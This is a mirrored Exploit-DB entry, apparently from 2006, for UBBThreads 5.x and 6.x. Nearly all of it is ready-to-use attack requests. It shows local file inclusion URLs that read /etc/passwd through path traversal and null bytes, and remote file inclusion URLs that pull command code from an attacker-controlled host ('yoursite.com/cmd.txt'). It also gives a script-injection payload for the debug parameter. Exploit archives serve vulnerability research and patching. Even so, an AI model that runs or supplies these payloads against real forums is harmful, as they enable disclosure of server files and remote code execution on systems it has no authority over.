bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/1843.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
1.2 KiB
Text
Raw Blame History

UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on UBBThreads 5.x,6.x
Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
Succesful exploitation register_globals on
Version 6.x
GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
If php version < 4.1.0 or UBB version <= 5.x
GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
XSS:
GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
Reference in a new issue View git blame Copy permalink